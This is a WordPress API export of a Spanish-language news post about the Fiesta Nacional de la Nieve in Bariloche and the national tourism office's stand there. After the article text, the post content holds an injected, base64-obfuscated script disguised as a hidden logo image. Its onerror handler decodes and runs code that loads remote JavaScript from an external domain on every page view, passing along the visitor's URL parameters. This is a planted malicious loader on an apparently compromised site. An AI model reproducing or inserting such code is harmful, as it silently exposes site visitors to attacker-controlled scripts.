{"id":8596,"date":"2024-08-27T08:28:01","date_gmt":"2024-08-27T11:28:01","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=8596"},"modified":"2025-08-13T15:39:33","modified_gmt":"2025-08-13T18:39:33","slug":"se-llevo-a-cabo-la-fiesta-nacional-de-la-nieve-en-bariloche","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=8596","title":{"rendered":"Se llev\u00f3 a cabo la Fiesta Nacional de la Nieve en Bariloche"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-black-color has-text-color has-background has-link-color wp-elements-94b4b112a8b64a9cadaa4a6de10ecba3\" style=\"background-color:#f0efef\">El festejo de invierno convoc\u00f3 m\u00e1s de 60 mil personas en tres d\u00edas.<\/h3>\n\n\n\n<p>La\u00a0<strong>Subsecretar\u00eda de Turismo de la Naci\u00f3n<\/strong>\u00a0estuvo presente en la\u00a0<strong>Fiesta Nacional de la Nieve<\/strong>\u00a0que se realiz\u00f3 del 23 al 25 de agosto, en\u00a0<strong>San Carlos de Bariloche<\/strong>, provincia de R\u00edo Negro.<\/p>\n\n\n\n<p>Se realizo gran variedad de actividades representativas de la identidad y las costumbres barilochenses, percibiendo y sintiendo el\u00a0<strong>esp\u00edritu de la nieve<\/strong>\u00a0y todo lo que ella genera.<\/p>\n\n\n\n<p>Los turistas pudieron disfrutar de una exhibici\u00f3n de\u00a0<em>esculturas en madera, carrera de mozos, concurso de tortas, shows en vivo, y desfile n\u00e1utico por el Nahuel Huapi. Asimismo, se tejieron mantas con fines ben\u00e9ficos, desfil\u00f3 la Guardia del Mar de la ciudad de Mar del Plata, y la fiesta finaliz\u00f3 con un gran show de Soledad Pastorutti<\/em>.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/whatsapp_image_2024-08-26_at_14.38.33.jpeg\" alt=\"\" \/><\/figure>\n\n\n\n<p>La Subsecretar\u00eda particip\u00f3 con una carpa promocional donde se\u00a0<strong>brind\u00f3 informaci\u00f3n tur\u00edstica de diferentes lugares del pa\u00eds<\/strong>, y diversi\u00f3n con juegos sobre s\u00edmbolos y destinos de Argentina.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/www.argentina.gob.ar\/noticias\/se-llevo-cabo-la-fiesta-nacional-de-la-nieve-en-bariloche\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:319px;height:auto\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El festejo de invierno convoc\u00f3 m\u00e1s de 60 mil personas en tres d\u00edas. La\u00a0Subsecretar\u00eda de Turismo de la Naci\u00f3n\u00a0estuvo presente en la\u00a0Fiesta Nacional de la Nieve\u00a0que se realiz\u00f3 del 23 al 25 de agosto, en\u00a0San Carlos de Bariloche, provincia de R\u00edo Negro. Se realizo gran variedad de actividades representativas de la identidad y las costumbres [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":8597,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,21],"tags":[],"class_list":["post-8596","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina","category-patagonia"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8596","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8596"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8596\/revisions"}],"predecessor-version":[{"id":10098,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8596\/revisions\/10098"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/8597"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8596"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8596"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8596"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}